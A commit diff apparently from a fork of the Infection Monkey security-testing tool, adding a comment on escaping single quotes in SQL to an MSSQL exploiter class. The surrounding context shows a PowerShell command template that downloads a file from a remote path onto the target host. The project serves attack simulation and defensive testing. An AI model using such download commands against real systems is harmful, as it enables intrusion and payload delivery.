forked from p15670423/monkey
Agent: Add a comment about escaping single quotes in SQL
This commit is contained in:
parent
83a2a911e9
commit
62cc401981
|
@ -31,6 +31,8 @@ class MSSQLExploiter(HostExploiter):
|
||||||
TMP_FILE_NAME = "tmp_monkey.bat"
|
TMP_FILE_NAME = "tmp_monkey.bat"
|
||||||
TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
|
TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
|
||||||
|
|
||||||
|
# Single quotes are escaped in SQL by using two of them.
|
||||||
|
# Example: 'It ain''t over ''til it''s over'
|
||||||
MONKEY_DOWNLOAD_COMMAND = (
|
MONKEY_DOWNLOAD_COMMAND = (
|
||||||
"powershell (new-object System.Net.WebClient)."
|
"powershell (new-object System.Net.WebClient)."
|
||||||
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
|
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
|
||||||
|
|
Loading…
Reference in New Issue